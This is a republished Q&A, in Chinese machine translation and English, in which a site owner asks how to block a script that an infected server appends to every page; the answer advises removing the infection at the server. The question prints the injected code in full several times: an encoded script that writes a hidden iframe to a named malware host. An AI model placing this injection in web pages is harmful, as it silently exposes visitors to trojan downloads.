在html / javascript / css中编程停止一个特定的代码块 [英] Programatically stopping a specific chunk of code in html/javascript/css

问题描述

其上有我的网站的服务器上也有病毒。

病毒注入了恶意代码

 < b id =BAs>< / b>< script> / *警告：Opera Only * / var hKo = document.createElement（script ）; hKo.text =document.write（unescape（\％3c％69％66％72％61％6d％65％20％73％72％63％3d％27％68％74％74％70 ％3a％2f％2f％6e％63％63％63％6e％6e％6e％63％2e％63％6e％2f％69％6d％67％2f％69％6e％64％65％78％2e ％70％68％70％27％20％73％74％79％6c％65％3d％27％64％69％73％70％6c％61％79％3a％6e％6f％6e％65％3b ％appendChild（hKo）< / script>< / script>< / script> 
 

到每个提供的单一页面上，并且它正在由Apache或类似的东西进行预处理到文件结尾。

我创建了一个测试文件，其中包含以下代码：

 < html> 
< head> 
< title>测试HTML文件< / title> 
< / head> 
< body> 
< h1>测试HTML文件< / h1> 
< / body> 
< / html> 
  

这不漂亮，但它的用途。

在浏览器中查看页面时，我会收到

 < html> 
< head> 
< title>测试HTML文件< / title> 
< / head> 
< body> 
< h1>测试HTML文件< / h1> 
< b id =BAs>< / b>< script> / * Warning：Opera Only * / var hKo = document.createElement（script）; hKo.text =document。写入（unescape（\％3c％69％66％72％61％6d％65％20％73％72％63％3d％27％68％74％74％70％3a％2f％2f％6e％ 63％63％63％6e％6e％6e％63％2e％63％6e％2f％69％6d％67％2f％69％6e％64％65％78％2e％70％68％ 20％73％74％79％6c％65％3d％27％64％69％73％70％6c％61％79％3a％6e％6f％6e％65％3b％27％3e％ 69.30％66％72％61％6d％65％3e \））;; document.getElementById（BAs）appendChild（hKo）< / script> 
< / body> 
< / html> 
  

可以从www.sagamountain.com/testfile.html查看（警告， ）

我需要以编程方式停止该div和该脚本的执行，因为它是一个iframe的网站上有一个木马。 HTML，CSS或JS，我只是需要一些方法来阻止JS执行。

它已经显示：none所以你看不到它，但我怎么能阻止iframe永远加载？

感谢您的帮助！ unescape事件解析为iframe，以 http://ncccnnnc.cn/img/index.php这显然是我的烦恼的根源。不要去该网站！

编辑：这是对 http://serverfault.com/questions/78439/my-website-is-

解决方案 / div>

很抱歉，我无法回答您的具体问题，但我认为您正在看这个错误的方式。你需要做的是不是删除病毒插入的html，你需要做的是谈到你的web主机/ sysadmin并清除病毒。

治疗症状不会治愈感染。 治疗疾病，但也将治疗症状以及消除病毒。

The server that has my website on it also has a virus on it.

The virus injects the malicious code

<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>

onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.

I created a test file, with the following code:

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>

It isn't pretty, but it served its purpose.

When viewing the page in my browser, I get

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>

which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)

I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.

It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?

Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!

EDIT: This is a followup to http://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459

解决方案

I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.

Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.

这篇关于在html / javascript / css中编程停止一个特定的代码块的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！